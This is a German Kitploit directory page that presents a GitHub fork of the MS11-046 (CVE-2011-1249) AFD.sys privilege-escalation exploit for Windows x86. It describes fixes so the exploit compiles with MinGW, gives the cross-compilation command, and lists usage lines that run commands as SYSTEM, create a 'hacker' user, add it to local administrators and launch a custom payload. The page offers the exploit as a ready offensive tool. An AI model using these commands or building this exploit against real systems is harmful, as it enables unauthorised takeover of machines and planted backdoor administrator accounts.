Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
edb-40564-mingw-fix — CVE-2011-1249 (MS11-046) AFD Privilegienerweiterung — MinGW-Crosskompilierungskorrektur + Unterstützung für benutzerdefinierte Befehle | Kitploit
Tools/GitHubGitHub/appl3b0y/edb-40564-mingw-fix
Privilege EscalationPayload-GenerierungSchwachstellenanalyseExploitationPenetrationstestsBinary-Exploitation
GitHubappl3b0y/edb-40564-mingw-fix

edb-40564-mingw-fix

CVE-2011-1249 (MS11-046) AFD Privilegienerweiterung — MinGW-Crosskompilierungskorrektur + Unterstützung für benutzerdefinierte Befehle

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

ms11-046-mingw

CVE-2011-1249 / MS11-046 — AFD.sys-Privilegieneskalation für Windows x86.

Original-Exploit von Tomislav Paskalev (EDB-40564). Dieser Fork behebt MinGW-Kompilierungsfehler und fügt eine benutzerdefinierte Befehlsausführung über argv[1] hinzu.


Änderungen gegenüber dem Original

#ÄnderungGrund
1FARPROC ZwQuerySystemInformation → typisierter Funktionszeiger (pZwQuerySystemInformation)MinGWs strenge Typprüfung lehnt den Aufruf einer parameterlosen FARPROC mit Argumenten ab — die Kompilierung schlägt fehl mit too many arguments to function
2securityPatches[]-Arrays als static markiertArrays, die innerhalb von if/else-Blöcken deklariert werden, werden auf dem Stack allokiert und verlassen den Gültigkeitsbereich; ohne static zeigen die Zeiger ins Leere
3Benutzerdefinierter Befehl über argv[1]Führen Sie jeden Befehl als SYSTEM aus, anstelle des fest codierten cmd.exe

Problem

Die Kompilierung des Originals mit MinGW schlägt fehl:

root@kitploit:~
ms11-046.c: error: too many arguments to function 'ZwQuerySystemInformation'; expected 0, have 4

FARPROC ist ein generischer Funktionszeiger, der mit null Parametern deklariert ist. MinGW erzwingt eine strenge Typprüfung und lehnt den Aufruf mit Argumenten ab. Die Korrektur besteht in einem typisierten Funktionszeiger mit der korrekten Signatur.

Vorkompilierte Binärdateien existieren (z. B. SecWiki/windows-kernel-exploits), unterstützen jedoch keine benutzerdefinierten Befehle.


Cross-Kompilierung unter Linux (MinGW)

root@kitploit:~
sudo apt install mingw-w64
i686-w64-mingw32-gcc ms11-046.c -o ms11-046.exe -lws2_32

Verwendung

root@kitploit:~
ms11-046.exe                                             # default: spawns cmd.exe as SYSTEM
ms11-046.exe "net user hacker Pass123! /add"             # add a user as SYSTEM
ms11-046.exe "net localgroup administrators hacker /add" # add to local admins
ms11-046.exe "c:\windows\temp\shell.exe"                 # run a custom payload as SYSTEM

Referenzen

  • MS11-046 — Microsoft Security Bulletin
  • CVE-2011-1249 - National Vulnerability Database
  • EDB-40564 — Original-Exploit
Tool herunterladen